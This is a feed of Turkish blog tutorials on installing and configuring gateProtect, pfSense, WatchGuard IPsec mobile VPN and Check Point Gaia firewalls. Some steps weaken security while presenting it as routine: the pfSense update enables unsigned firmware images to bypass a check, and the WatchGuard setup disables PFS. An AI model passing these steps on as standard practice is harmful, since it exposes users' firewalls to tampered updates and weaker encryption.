Quantcast
Channel: Güvenlik
Viewing all 105 articles
Browse latest View live

gateProtect UTM Firewall Özellikleri ve Yazılım Kurulumu

$
0
0

Bildiğiniz gibi IT için güvenlik tehditleri her geçen gün artmaktadır. Bu güvenlik tehditlerini önlemek için güvenlik gelişmişliğini de arttırmak gerekiyor. Bunun sonucunda yüksek maliyet ve iş yükü gerekebilir. Bütün bu karmaşıklığı gidermenin en iyi ve kolay çözümü yeni nesil UTM Firewall gateProtectir. gateProtect, ağ güvenliği konusunda IT çözümleri sunan benzersiz bir üründür. Neler sunuyor bize bu gateProtect diye sorarsanız; cevabım şu şekilde olur: güvenlik duvarı, köprüleme, VLAN, çoklu ortam açma, trafik şekillendirme, web filtresi (içerik ve URL filtreleme), Qos, IPSec / SSL(x.509), IDS/IPS, antivirüs, anti spyware, antiphising, Messenger ve Skype konuşma filtresi, istenmeyen spam mailleri algılama ve engelleme, HTTPs Proxy, VPN şifreleme ve daha fazlasını sunuyor.

 

Benzersiz ve patentli eGUI teknolojisi sayesinde, devrim niteliğinde görsel tabanlı arayüz sunar. ISO 9241 standartlarına uygun tek üreticidir. ISO 9241, kolay kullanılabilirlik ve yönetilebilirlik anlamına gelir. eGUI teknolojisi sayesinde, IT güvenliği artar. Aynı zamanda sistemlerin bakımı kolaylaşır ve IT hataları en aza indirgenir. Böylece zaman ve işletme maliyetlerinde tasarruf sağlanmış olur.

 

Size gateProtecet’in sunduğu özelliklerden kısaca bahsetmek istiyorum.

 

Güvenlik Duvarı: gateProtect, meydana gelen ağ saldırını tespit etmek ve önlemek için eşsiz bir koruma sağlar. Ağ trafiği belirli algoritmalar ve saldırı modellerini kullanarak sürekli kontrol eder. Bu ağ protokolleri (TCP, UDP, IP, ICMP, SSL, SSH, HTTP ve ARP) gibi güvenlik açıklarını sağlar.

 

Web Filtreleme: , gateProtect anti-virüs ve gateProtect spam koruma özellikleri ile birlikte, phishing, malware,adware ve çok daha fazlasına karşı kapsamlı bir düzeyde koruma sağlar. gateProtect Web filtreleme 64 farklı kategori kullanır ve maksimum düzeyde koruma sağlar. Dilerseniz içerik bazlı dilerseniz URL bazlı filtreleme yapabilirsiniz.

 

Antivirüs/Spyware/Malwre Koruması ve HTTPs Taraması: Tüm ağ için kapsamlı bir koruma düzeyini garanti altına almak için, tüm e-posta ve web trafiği gateProtect anti-virüs çözümü ile ağ geçidi üzerinde doğrudan tarar. Aynı zamanda HTTPs sayfaların taramasını bile içerir. Bu sayede ciddi bir tehdit veya kötü amaçlı yazılım ağa girmeden engellenebilir. Bu çözüm, malware, virüsler, solucanlar, trojenler ve hatta key loggerlar,casus yazılımları ve adware olmak üzere tüm ortak formlar için gerçek zamanlı koruma sağlar. gateProtect anti-spam olarak Comtouch yazılımını, antivirüs olarak da Kaspersky yazılımını kullanır.

 

VPN sihirbazı (IPSec ve SSL için): gateProtect, site to site ve client to site VPN bağlantılarını IPSec ve SSL yoluyla bütün ortak formlarda destekler. Uzak kullanıcılar, herhangi bir kısıtlama olmadan diledikleri yerden SSL ile çalışırken tüm hizmetlerden faydalanabilecektir.

 

Trafik Şekillendirme: Bu özellik sayesinde internet bant genişliğini kontrol altına alabilirsiniz. Maksimum ve minimum bant genişliği her bir kullanıcı için düzenlenebilir. Dilerseniz bu düzenlemeleri servis düzeyinde de yapabilirsiniz. Download ve upload sınırlarını belirleyebilirsiniz.

 

Monitoring: Bu özellik sayesinde, network kartınızı, sabit disklerinizi, ağ trafiğinizi, Vpn bağlantılarını ve kullanıcıları izleyebilirsiniz.

 

Ayrıca gateProtect ile kullanıcıların girdiği web sayfalarını tarih ve süre olarak izleyebilirsiniz. Kullnacıların hangi servisleri kullandığını, hangi kullanıcının ne kadar veri kullandığını görebilirsiniz ve bunu kontrol altına alabilirsiniz. IPS/IDS saldırılarının istatistiklerini de görebilir ve raporlayabilirsiniz.

 

Command Center: Bu özellik sayesinde 500 adet gateProtect cihazınızı merkezi olarak yönetebilirsiniz. Özellikle birden fazla şubesi olan şirketler için vazgeçilmez bir özelliktir. Bu sayede maliyeti ve hataları azaltır, zamandan kazanmış olursunuz. Command Center aşağıdaki özellikleri bize sağlar.

 

- izleme/raporlama,

-Yedekleme yönetimi

-Lisans yönetimi

-Vpn kurulumu

 

Kurulum: Bu bölümde sizlere cihaza yazılımın yüklenmesi ile ilgili bilgi aktaracağım.

 

Öncelikle https://www.gateprotect.com/mygateprotect/ adresinden kullanıcı adı ve şifre ile giriş yaptıktan sonra Downloads->Firewall seçeneğini tıklanıldığında USB-Stick 9.0 bootable yazılımını indirmemiz gerekiyor. Bilgisayarımıza en az 4 GB’lık bir flash bellek taktıktan sonra yazılımı çalıştırıyoruz. Burada sizlere önemli bir uyarı vermek istiyorum. Yazılım flash belleğinize format atacaktır, bu yüzden verilerinizi önceden yedekleyiniz.

 

Cihazımıza yazılımı yüklememiz için http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html adresinden “PuTTY” yazılımını indirmemiz gerekiyor.

 

Cihazımızla birlikte gelen Com port bağlantı kablosunu bilgisayarın Com portuna ve cihazımızın RJ45 ethernet girişine bağlıyoruz.

 

Daha önce yazılımı yüklediğimiz flash belleğimizi bilgisayara takıyoruz ve PuTTY programını çalıştırıyoruz. Conenction typeserial” olarak işaretliyoruz ve “Open “butonuna tıklıyoruz.

 

 

image001

 

 

Cihazımızın güç düğmesine bastığımızda karşımıza aşağıdaki gibi sistem bilgisi gelecektir.

 

 

image002

 

 

Yazılım yüklenmeye başlayacaktır ve karşımıza Lisans Sözleşmesi gelecektir.Klavyeden “Next” butonuna basıyoruz.

 

 

image003

 

 

“Next” dedikten sonra karşımıza Lisans sözleşmesini kabul edip etmediğimizi soran bir pencere açılacaktır. “Yes” butonunu seçiyoruz.

 

 

image004

 

 

Sözleşmeyi kabul ettikten sonra karşımıza cihazın sabit diskleri ve network arayüz kartları ile ilgili bilgiler sunulacaktır. “Next” butonunu seçiyoruz.

 

 

image005

 

 

Karşımıza çıkan ekranda yeni kurulum veya yapmış olduğumuz kurulumu yedekleme ile ilgili seçenekler çıkacaktır. Biz yeni kurulum yapacağımız için “New installationseçeneyini seçiyoruz.

 

 

image006

 

 

Karşımıza çıkan ekranda eğer firewall-serverda iki tane hardisk varsa, yazılımı software-raid olarak yükleyebileceğimizi belirtmektedir. GPZ 1000 ve üzeri modellerde iki adet harddisk bulunuyor. Biz birinci harddiski seçiyoruz ve “Next” diyoruz.

 

 

image007

 

 

Aşağıdaki ekranda network arayüzü ayarları yapılmaktadır. İsterseniz elle şirketinizin yapısına göre IP adreslerini yazabildiğiniz gibi “F12” tuşuna basarak da otomatik olarak gateProtect sizin için alanları aşağıdaki gibi dolduracaktır. “Next” butonuna basıp ilerliyoruz.

 

 

image008

 

 

Yapılandırma başarıyla tamamlandıktan sonra Hostname/domain name ve Password bilgilerini doldurduktan sonra “Next “diyoruz.

 

 

image009

 

 

Daha sonra karşımıza aşağıdaki uyarı gelecektir. gateProtect ‘in harddisk içindeki tüm verileri silinecektir. Kurulama başlamak için “Install” seçeneğine basınız. Aksi takdirde PC’nizi yeniden başlatınız.

 

image010

 

 

“Install” dedikten sonra karşımıza cihazın hard diskinin silineceği ile ilgili bir uyarı gelecektir. “Yes” diyoruz ve devam ediyoruz.

 

 

image011

 

 

Daha sonra karşımıza kurulum süreci ile ilgili bilgiler gelecektir. Bu bilgiler sırasıyla; hard diskin bölümlenmesi ve formatlanması, firewall kurulumu ve yapılandırması, boot yapılandırması.

 

 

image012

 

 

Daha sonra yukarıda bahsetmiş olduğum işlemlerin tamamlandığına dair bilgiler gelecektir. “Next” diyoruz.

 

 

image013

 

 

Bir sonraki adımda kurulum tamamlanacaktır. Flash belleğinizi çıkarın ve gateProtect cihazınızı ”Reboot” seçeneğine basarak yeniden başlatınız.

 

 

image014

 

 

Son olarak cihaz yeniden başladıktan sonra karşınıza aşağıdaki görüntü gelecektir.

 

 

image015

 

 

Böylelikle gateProtect yazılımını başarıyla tamamlamış olduk. http://www.gateprotect.com/en-GB/downloads/management-tools.html adresinden “Administration Client” yönetim panelini indirip bilgisayarınızdan giriş yaptığınız zaman cihazın arayüzüne bağlanabilirsiniz. Kullanıcı adı ve şifre bilgileri default olarak “admin” dir.


Pfsense Update

$
0
0

Merhaba arkadaşlar bu makalemizde Pfsense update konusunu işleyeceğiz. Eğer daha önceden yapınız içerisine Pfsense nin önceki sürümlerini kurduysanız ve son sürüme geçmek gibi bir düşünceniz varsa bunu direk pfsense dashboard üzerinden gerçekleştirebilirsiniz. Benim senaryomda Pfsense 2.0 RELEASE (i386) yani bir önceki sürümü olan 32 bit lik sürümünü Pfsense 2.0.1 RELEASE (i386) sürümüne yükselteceğiz. Bundan önce muhakkak Pfsense yi backup lamanızı öneririm. Güncelleme sonrasında yaşanacak her hangi bir sıkıntıdan dolayı pfsense makinenizin çökmesi ihtimalini göz önünde bulundurmamız gerekmekte aksi taktirde yaşanacak bir sıkıntıda pfsense makinemizi tekrar konfigure etmemiz gerekebilir. Buda bizim için zaman kaybı olarak artı bir iş yükü çıkaracak ve yapımız içerisinde olan tüm clientlerimiz bu zaman zarfında internete çıkamayacaklar bu da tüm işlerin aksamasına neden olacaktır. İsterseniz Pfsense Update işlemine geçebiliriz.

 

 

image001

 

 

Pfsense Update-01

 

Pfsense arayüzüne baktığımızda version bilgisisi olarak 2.0- Release (i386) versiyonunu kullandığımızı görebilirsiniz. Update işlemini başlatabilmek için Update available. Click here tıklamamız gerekmekte Update available bize yeni bir güncellemenin mevcut olduğunu belirtiyor. Click Here tıklayalım.

 

 

image002

 

 

Pfsense Update-02

 

Yukarıda ki ekranı inceleyecek olursak -1 adımda Auto Update tabında bulunan Invoke Auto Upgrade yeni güncelleştirmeleri çağırıyoruz.

 

 

image003

 

 

Pfsense Update-03

 

Altı kırmızı ile çizili olan Update cannot continue. You can disable this check on the updater settings tab. Yani güncellemelere devam edemediğini ve Updater settings tabına geçmemizi ve gerekli izinlerin verilmesini belirtmekte.

 

 

image004

 

 

Pfsense Update-04

 

Yukarıda ki ekranda Updater Settings tabına geldik. Görüldüğü gibi her hangi bir yapılandırma mevcut değil. İsterseniz bir sonra ki şekle geçerek gerekli yapılandırmaları yapmaya başlayabiliriz.

 

 

image005

 

 

Pfsense Update-05

 

Yukarıda ki şekle bakacak olursak -1 adımda Default Autı Update URLs bölümünde yükseltmek istediğimiz. Sürümü 64 bit mi yoksa 32 bit olarak mı yükselteceğimizi sormakta makalemizin başında belirttiğim gibi 32 bit bir pfsense kullandığım için yine Pfsense 32 bit yani pfsense i386 stable updates (kararlı güncelleme) seçiyorum. -2 adımda Firmware Auto Update URL (Firmware otomatik güncelleme) otomatik olarak seçilmekte -3 adıma bakacak olursak Unsigned images (imzasız imaj) eğer indirdiğimiz sürüm pfsense tarafından imzalı değilse yine de indirebileceğini belirtiyoruz. Son adımda ise Save diyerek yaptığımız yapılandırmayı kaydediyoruz.

 

 

image006

 

 

Pfsense Update-06

 

Tekrar AutoUpdate tabına gelerek Invoke Auto Upgrade tıklıyoruz. Otomatik güncellemeleri çağırıyoruz. Yukarıda ki ekranda görüldüğü gibi update image sini indirmeye başlıyoruz. İndireceğimiz ve daha önceki versiyon bilgilerini de yine yukarıda ki ekranda görmemiz gerekmekte.

 

 

image007

 

 

Pfsense Update-07

 

Artık yeni updates (güncellemeleri) indirmeye başladık. Yukarıda ki ekranda indirdiğimiz update paketinin boyutlarını görebiliriz.

 

 

image008

 

 

Pfsense Update-08

 

Pfsense makineme tekrar dönüyorum. Görüldüğü gibi pfsense makinem benim yaptığım aksiyonlardan etkileniyor ve yaptığı işlemler hakkında ekranda bilgiler vermeye başlıyor. Upgrade işlemi bittikten sonra makinemizi yeniden başlatıyor. Bu işlemler pfsense tarafından otomatik olarak gerçekleşmekte.

 

 

image009

 

 

Pfsense Update-09

 

Yukarıda ki ekranda The firewall will reboot once the operetion is completed. Upgrade işlemi gerçekleştikten sonra pfsense makinemizin yeniden başlayacağını belirtiyor.

 

 

image010

 

 

Pfsense Update-10

 

Pfsense upgrade dosyalarını indirerek dosyaları çıkarttığını görebiliriz.

 

 

image011

 

 

Pfsense Update-11

 

Görüldüğü gibi artık pfsense makinemizi Pfsense 2.0 RELEASE (i386) yani bir önceki sürümü olan 32 bit lik sürümünü Pfsense 2.0.1 RELEASE (i386) sürümüne yükseltik. Pfsense makinemiz artık başladı.

 

 

image012

 

 

Pfsense Update-12

 

Pfsense dashboard (pfsense panele) döndüğümüzde artık pfsense versiyonumuzun 2.0.1-RELEASE (i386) sürümüne yükselttiğimizi görebiliriz. Bu da güncellemelerimizi başarılı bir şekilde tamamladığımızı göstermekte. Bu makalemde sizlere Pfsense Update işleminin ne kadar kolay olduğunu göstermeye çalıştım. Umarım sizler için faydalı olmuştur. Başka makalelerde tekrar görüşmek ümidiyle…

Watchguard Mobil VPN With IPsec Konfigürasyonu – IPhone

$
0
0

 

Günümüzde Bilişim sektöründe çalışan insanların büyük kısmı 7/24 acil durumlarda şirketiyle bağlantı kurması gerekmektedir. Şirket dışında olduğumuz zamanlarda acil durumlarda Cep telefonlarımız ile güvenli bir şekilde şirket ağına dahil olabilir, sorunlarımızı çözebiliriz. Öncelikle bunun için IPsec destekleyen telefon kullanmamız yeterlidir. Ben konfigürasyonu Apple Iphone üzerinden yapacağım.

 

Policy Manager i açıyoruz Resimde görüldüğü gibi Vpn/ Mobil VPN / IPsec Tabını açıyoruz.

 

 

image001

 

 

Gelen ekrana next diyoruz.

 

 

image002

 

 

Authentication Server ımız Firebox-DB olacak. Burada İstediğimiz grup ismini veriyoruz. Next ile devam ediyoruz.

 

 

image003

 

 

Burada oluşturacağımız Tunnel için şifre belirleyip next diyoruz. Mobil cihazımızı ayarlarken bunu kullanacağız.

 

 

image004

 

 

Tüm Trafiği tünelden akış için zorla kısmını seçip next diyoruz.

 

 

image005

 

 

İşyerine bağlanacağımız ip bloğunu seçiyoruz. Ben herhangi bir aralık belirtmedim Next diyoruz

 

 

image006

 

 

Bağlandığımızda alacağımız ip aralıgını belirliyoruz. Ben local ağımdan farklı bir grup tanımladım Setup/configuration /trusted /secondary bölümüne bir kaç tane network daha tanımladım oradan bir aralık verdim.

 

 

image007

 

 

Ve tanımlamış olduğumuz grup için kullanıcı ekle kısmını seçip finish diyoruz. Burada ister var olan bir kullanıcıyı ya da yeni kullanıcı oluşturarak grubumuzun üyesi yapıyoruz. Ben yeni kullanıcı ekliyorum. Add kısmına tıklayıp kullanıcı Adını veriyorum minimum 8 haneli bir şifre verdikten sonra Available kısmındaki grubumuzu members kısmına alıp kullanıcımızı grubumuza üye yapıyoruz.

 

 

image008

 

 

image009

 

 

OK diyoruz ve açılan pencerede tanımlamış oldugumuz IPsec konfigürasyonunu görüyoruz. Burada ayarları şifreleri değiştirebiliriz. Ve iphone için ayar yapmamız gerekecek Android ve windows mobile de farklı olabilir. Ayarları cihaz üreticisinden öğrenebilirsiniz. Iphone için olan ayarları gösteriyorum; ilk olarak kuralımızı editliyoruz. Sarı renk ile belirmiş olduğum yerde iş yerimizin dış ip si var. eğer yedek ip lerimiz varsa onlardan birinide seçebilirsiniz

 

 

image010

 

 

image011

 

 

IPsec tunnel kısmını açıyoruz burada Proposal ı açıyoruz. Encryption modlarımız AES-256 bit olacak. Key experition kilobites 0 olacak. ok diyoruz.

 

 

image012

 

 

PFS kutucuğundaki tiki kaldırıyoruz. Advanced tabını açıyoruz Hellman-Group-2 olacak SA life 1 saat yapılacak ok diyoruz kapatıyoruz.

 

 

image013

 

 

Şimdi Policy Manager üzerine geliyoruz tanımladığımız kuraldan dolayı otomatik olarak Watchguard-IPsec kuralı açılacak burada ben ayarlarımı bu şekilde yaptım sürüm farkından dolayı bu kural açılmazsa kendinizde yeni policy ekleyerek packet filters kısmından IPsec kuralını seçip oluşturabilirsiniz. Bununla beraber Authentication serverimiz Firebox-DB olduğu için Watchguard Authentication kuralı policy de ekli olmalıdır.

 

 

image014

 

 

Firewall üzerinde ayarlarımız bitti şimdi gelelim mobil cihazımıza; Telefonumun Ayarlar / Genel / Ağ kısmına geliyoruz Vpn kısmını açıyoruz.

 

 

image015

 

 

Vpn konfigürasyonu ekle diyoruz IPsec kısmını açıp açıklamaya herhangi bir isim veriyoruz. sunucu işyerimizin external ip si. Hesap; oluşturduğumuz kullanıcı adı ve parolasını giriyoruz. grup adı IPsec için oluşturduğumuz grup sır: grubun parolası sağ üstten kaydet diyoruz. Geri gelip Vpn i çalıştırıyoruz gördüğünüz gibi bağlandı

 

 

image016image017

 

 

Mobil VPN With IPSec konfigürasyonumuz tamamlanmıştır. Neler yaptığıma dair birkaç örnek vermek istiyorum. Şuanda şirketimin local ağına dahil olmuş Telefonumdan yüklü olan Remote Desktop programıyla bilgisayarıma bağlanıyorum masaüstüm ve policy manager kullanmaya alıştıkça çok kolaylaşacak.

 

 

image018image019

 

 

image020

 

 

openfire servera bağlanabilen bir program ile local ağımızdaki yazışmalara katılabiliyorum

 

 

image021

 

 

Daha birçok işlem gerçekleştirebiliyorsunuz. Router, Switch, Vmware e bağlanmak vs. yeter ki telefonunuz desteklesin.

 

Umarım faydalı olur. Paylaşılmayan yeni konfigürasyonlarda görüşmek üzere.

Check Point R75.40 Gaia Kurulum ve Konfigürasyonu

$
0
0

Check Point, dünyanın en önemli firewall üreticileri arasında yer alan bir network güvenlik firmasıdır. OSI tüm katmanlarında güvenlik sağlayabilen Secure Virtual Network teknolojisini kullanmaktadır. Check Point Software Blade R75.X platformu ile firewall ürünlerini network katmanından, uygulama katmanına taşıdı. Gaia için IPSO ile Secure Platform özelliklerini birleştirerek daha sağlam güvenlik özellikleri sunan bir işletim sistemi diyebiliriz.

 

R75.X Platformu ile gelen yenilikler;

 

·         Identity Awareness

·         Mobile Access – Uzaktan Bağlantı (VPN) ve Mobile cihaz desteği

·         Mobile Access (iPhone,iPad desteği var)

·         3D Security – Policies, People, Enforce

·         Data Loss Prevention (Exchange ile entegrasyonu yapılabiliyor ve intranette tarama yapabiliyor.)

·         SSL decryption

·         URL Filtering/Application Control (Birlikte çalışıyorlar)

 

Geliştirilen Özellikler;

·         SmartConsole (Performans)

·         SmartEvent ve SmartView Tracker (Query)

 

Gaia ile Gelen Yenilikler

 

·         Geliştirilmiş Web Arayüzü

·         64 bit desteği

·         Entegre ipv6 desteği

·         Role-Based Admin

·         Dynamic Routing Protokolleri

·         VRRP ve SecureXL

·         Gateway Virtualization

·         Software Updates

 

Check Point Gaia Deployment Metodları

 

Standalone Deployment

 

Security Management Server ve Security Gateway’in aynı bilgisayar ya da bir appliance üzerine yüklendiği kurulum türüdür.

 

 

image001

Standalone Computer

Security Gateway Bileşenleri

Security Management Server

 

 

 

Distributed Deployment

 

Security Management Server ve Security Gateway’in farklı bilgisayar ya da bir appliance üzerine yüklendiği kurulum türüdür.

 

 

image002

Security Gateway

Network Connection

Security Management Server

Security Gateway Bileşenleri

Security Management Server Bileşenleri

 

 

Standalone Full HA

 

Security Management Server ve Security Gateway’in bir appliance üzerinde kurulu olduğu ve iki appliance’ın High Availibility mode’da çalıştırıldığı kurulum türüdür.

 

 

image003

Primary Appliance

Direct appliance to apliance connection

Backup appliance

Security Gateway Bileşenleri

Security Management Server Bileşenleri

 

 

 

Biz bu makale serisinde Distributed Deployment olarak Check Point kurulum işlemlerini gerçekleştireceğiz. İlk olarak Check Point Management kurulumunu, ardından da Security Gateway ürününün kurulumlarını yapacağız.

 

Başlamadan önce gerçekleştireceğimiz yapılandırmanın için kullanacağımız makinelerin ip yapılandırmaları aşağıdaki gibidir.

 

 

Check Point Security Management

Check Point Security Gateway

SmartConsole

OS : Gaia

Internal IP : 192.168.1.1

OS : Gaia

Internal IP : 192.168.1.2

DMZ : 10.0.0.1

External : 78.135.67.20

OS : Windows 7

IP : 192.168.1.35

 

 

 

Bu makalede Check Point Gaia R75.40 versiyonunu (en güncel versiyon) üzerinden işlemlerimizi gerçekleştireceğiz. İsteğe bağlı olarak RedHat ve Windows işletim sistemleri üzerine de Check Point R75.40 kurulumunu gerçekleştirebiliriz, ancak işletim sistemleri üzerindeki güvenlik açıkları sebebiyle bu tarz kurulumları tercih etmiyorum.

 

Sistemi Check Point R75.40 Gaia DVD’si ile boot ediyoruz. Welcome to Check Point Gaia R75.40 ekranında Install Gaia on this system’i seçip kurulumu başlatıyoruz.

 

 

image004

 


Kurulumu gerçekleştirmek istiyor musunuz sorusuna tabii ki istiyorum diyerek devam ediyoruz.

 



image005

 


Klavye dilini seçiyoruz. Ben bu tür kurulumlarda sorun yaşamamak adına US (ingilizce) klavye seçeneği ile devam ediyorum. )Sql kullanan uygulamalarda yaşanan sorunlardan kaynaklı alışkanlık diyebiliriz. J )

 

 

image006

 

 

Partitions Configuration bölümünde system-swap, system root,log ve backup dosyaları için ne kadarlık bir alan ayırmak istediğimiz belirledikten sonra devam ediyoruz. Bu adımı default ayarları kabul ederek geçebilirsiniz.

 

 

image007

 


Gaia ile gelen yeniliklerden birisi de burada karşımıza çıkıyor. Önceden kurulum sırasında şifre oluşturmuyorduk ve default parola : admin olarak geliyordu.

 

Gaia’da ise kurulum sırasında admin şifresini belirliyoruz.

 

 

 

image008

 

 

Management için kullanacağımız ip adresini atayacağımız network adaptörü seçiyoruz. Ben eth0’ı seçiyorum.

 

 

image009

 

 

Kurulum sonrasında web management arayüzüne erişim için kullanacağımız ip adresini yazıyoruz.

 

 

image010

 


Diskimizin formatlanacağını ve bunu onaylayıp onaylamadığımızı soruyor. Formatla gitsin diyerek devam ediyoruz.

 

 

image011

 

 

Check Point Gaia işletim sisteminin kurulumu tamamlandıktan sonra sistemi yeniden başlatmamızı söyleyen bu ekrana tamam isteklerin bizim için emirdir diyoruz.

 

Ayrıca sistem yeniden başladıktan sonra web management arayüzüne erişebileceğimiz ip adresi bilgisi de bu ekranda belirtiliyor.

 

 

image012

 

 

Sırada Security Management kurulumu ve konfigürasyon işlemleri var.

 

Sistem yeniden başlatma işlemi tamamlandıktan sonra default kullanıcı adı olan admin ve kurulum sırasında belirlediğimiz parola ile giriş yapıyoruz.

 

 

image013

 

 

Web arayüzünde de değişikliklerin yaşandığını hissettiren bir wizard bizi karşılıyor.

 

 

image014

 

 

Tarih ve saat bilgilerinin düzenleyip devam ediyoruz.

 

 

image015

 

 

Check Point Gaia için host name, domain name, dns bilgilerini giriyoruz.

 

 

image016

 

 

Interfaces için ip adresi bilgisini giriyoruz. İstenirse burada dhcp’den ip alınması da sağlanabilir.

 

 

image017

 

 

Security Management or Security Gateway seçeneğini işaretleyip yolumuza devam ediyoruz.

 

 

image018

 

 

Product kısmında isterseniz Security Gateway ve Security Management’ı seçip bir kurulum gerçekleştirebilirsiniz. Ben bu makalede Security Management’ı ayrı servera, Security Gateway’i ayrı servera kuracağım için Security Management’ı seçiyorum.

 

 

image019

 

 

Administrator adını ve şifresini belirleyip ilerliyoruz.

 

 

image020

 

 

Security Management web arayüzünde login olabileceğimiz seçenek olarak this machine’i seçiyorum.

 

İsterseniz herhangi bir ip adresinden, isterseniz belirleyeceğiniz bir network’ten, isterseniz belirleyeceğiniz bir ip aralığından web arayüzü için erişim izni verebilirsiniz.

 

 

image021

 

 

Finish butonuna tıkladığımızda yapılandırma işlemi başlayacak devam etmek istiyor musunuz diye soruyor. Devam etmeyeceksek bu işlemleri niye yaptık arkadaş diyoruz. J

 

 

image022

 

 

Ve yapılandırma işlemlerini başarıyla tamamladık.

 

 

image023

 

 

İlk olarak Overview ekranı karşımıza geliyor,sistem ile ilgili özet bilgileri bu ekranda görüyoruz.

 

Network Management

 

Bu bölümü kullanarak network interface ayarlarımızı gerçekleştirebilir, static arp kayıtları oluşturabilir, DHCP Server yapılandırmasını gerçekleştirebilir, ipv4ipv6 statik routing işlemlerini gerçekleştirebiliriz. Ayrıca Host name, domain name ve dns bilgilerini de bu bölümü kullanarak düzenleyebiliriz.

 

System Management

 

Tarih,saat ve bölgesel ayarları, SNMP agent ayarlarını, schedule job ile zamanlanmış işlemleri yaptırabilir, mail ile bildirimler gönderilmesini sağlayabilir,Proxy Server ayarlarını yapabilir, Banner mesajını düzenleyebilir, session timeout süresini belirleyebilir, ipv6 desteğini açma ve kapatma işlemlerini gerçekleştirebilir, system logları ile ilgili düzenlemeler yapabilir,telnet’i aktifleştirebilir , web arayüzüne bağlanacak kullanıcılara izin verebilir ve kurulum sırasında oluşturulan sertifika bilgisini görüntüleyebiliriz.

 

Advanced Routing

 

DHCP Relay ayarlarını yapabilir, BGP yapılandırmasını gerçekleştirebilir, IGMP ayarlarını yapabilir,PIM (Protocol Independent Multicast) ayarını yapılandırabilir, OSPF düzenlemelerini gerçekleştirebilir, BGP ve diğer protokoller için filtreler oluşturabilir, Router Discovery ile ICMP Router Discovery protokolü kullanılarak dinamik olarak clientların tespit edilmesini sağlayabilir, gerçekleştirdiğimiz routing düzenlemelerini monitor edebilir ve policy tabanlı route’lar oluşturabiliriz.

 

User Management

 

Bu bölümü kullanarak parola değiştirme, kullanıcı ve role tanımlama işlemlerini gerçekleştirebilir, password policy’ler oluşturabilir, authentication server tanımlaması yapabiliriz.

 

High Availibility

 

VRRP ayarlarını, dinamik failover yapılandırmalarını bu bölümden gerçekleştiriyoruz.

 

Maintenance

 

Lisans yükleme , upgrade paketlerini yükleyip sistemi upgrade etme, softare update policy belirleme, sistem updatelerini gerçekleştirme, sistemin backup’ını alma gibi işlemleri bu bölümden gerçekleştiriyoruz.

 

Manage Software Blade using SmartConsole bölümünden Download Now diyerek SmartConsole uygulamasını indiriyoruz.

 

 

image024

 

 

Smart Console kurulumunu gerçekleştiriyoruz.

 

 

image025

 

 

Kurulum gerçekleştikten sonra Smart Dashboard uygulamasını çalıştırıyoruz. Check Point Security Management Server’ın ip adresini ve kurulum sırasında tanımladığımız kullanıcı adı ve parolayı girerek SmartDashboard bağlantısını gerçekleştiriyoruz.

 

 

image026

 

 

Bu fingerprint’in doğruluğunu onaylamamız isteniyor.

 

 

image027

 

 

Ve işte Check Point Gaia R75.40 , yeniliklerin tanıtıldığı bir Hoşgeldiniz ekranıyla bizi karşılıyor.

 

 

image028

 

 

Hemen Firewall sekmesine geçerek Network Objects altında Check Point bölümünden HostName kontrolü yapıyoruz.

 

 

image029

 

 

Evet yolu yarıladığımızı söyleyebiliriz. Sırada Security Gateway kurulumu var. Secure Platform kurulumunu ve sonraki yapılandırmalarının ekran görüntülerini tekrardan eklemeyeceğim. Kurulum sırasında Security Management’ı seçtiğimiz Product Installation ekranına kadar olan bölümü Security Gateway kurulumu için de aynen gerçekleştiriyoruz.

 

Product Installation ekranına geldiğimizde Security Gateway’ı seçiyoruz.

 

 

image030

 

 

Gateway için Dynamic IP ataması yapmak istiyor musunuz sorusuna hayır diyoruz.

 

 

image031

 

 

Burası önemli bir nokta, çünkü bu adımda oluşturacağımız key’i, makalenin ilerleyen bölümlerinde Security Management ve Security Gateway arasında Secure Internal Communication oluşturmak için kullanacağız.

 

 

image032

 

 

Finish butonu ile işlemimizi tamamlıyoruz.

 

 

image033

 

 

Check Point Gaia R75.40 ile gelen yeniliklerden, dağıtım yöntemlerinden bahsettikten sonra, Security Management ve Security Gateway kurulumlarını gerçekleştirip, Smart Console kurulumunu tamamladık.

 

Makalemizin bundan sonraki kısmında, Security Management üzerine Smart Console ile bağlanarak Security Gateway ve Security Management arasındaki Secure Internal Communication düzenlemesini yaparak bu iki ürünün birbirinden haberdar olmalarını sağlayıp, aralarında bir güven ilişkisi (trust) oluşturacağız.Ardından genel olarak firewall üzerinde kural oluşturma mantığından bahsedip, birkaç kural oluşturduktan sonra makalemizi tamamlayacağız.

 

İlk olarak SmartConsole uygulaması aracılığıyla Check Point Security Management üzerine bağlanıyoruz.

 

 

image034

 

 

Firewall sekmesini açıp Check Point objesi üzerinde sağ tıklayıp Security Gateway/Management’ı seçiyoruz.

 

 

image035

 

 

Check Point Security Gateway Creation ekranında Classic mode’u seçerek yapılandırmamıza devam ediyoruz.

 

 

image036

 

 

Name kısmında Check Point Security Gateway için bir ad belirtiyoruz.

 

IP Address kısmında ise Gateway ürününe kurulum sırasında verdiğimiz ip adres bilgisini giriyoruz.

 

Comment kısmına bir açıklama yazmak ise tamamen isteğe bağlıdır.

 

Secure Internal Communication kısmının altında bulunan Communication butonuna tıklayıp Gateway ve Management arasındaki trust ilişkisinin kurulması için gerekli key bilgisini girip Initialize butonunu tıklayıp Certificate State kısmında Trust established olarak gördüğümüzde bu işlem başarıyla gerçekleşmiş oluyor.

 

 

image037

 

 

Ve Network Security kısmında Firewall’u seçtikten sonra Topology bölümüne tıklıyoruz.

 

Not: Aktifleştirmek istediğiniz modülleri Network Security bölümünden seçebilirsiniz. İlgili modülün yönetim kısmı üzerinden de aktifleştirme işlemi gerçekleştirilebilir.

 

 

image038

 

 

İlk yapılandırma için oldukça önemli bir adımla devam edelim. Check Point Security Gateway üzerinde bulunan network adaptörlerimizden hangisinin internal, hangisinin external, hangisinin dmz olduğunu DOĞRU bir şekilde tanımlamamız oldukça önemli.

 

 

Topology kısmından Get butonuna ve ardından Interfaces with topology seçeğine tıklayıp , topolojinin otomatik olarak çıkarılmasını sağlıyoruz.

 

 

image039

 

 

image040

 

 

image041

 

 

Bu bölümde topoloji doğru olarak gelmezse network adaptörünün üzerinde edit’i tıklayarak Interface Properties ekranından Topology sekmesine geçiş yaparak network adaptörünün internal mı,external mı yoksa dmz için mi yapılandırılmış olduğunu belirleyebiliriz.

 

 

image042

 

 

NAT bölümüne geçip, kullanıcılarımızın internete çıkarken Gateway!in arkasından Hide olarak bağlanmasını istediğimizi belirtiyoruz.

 

 

image043

 

 

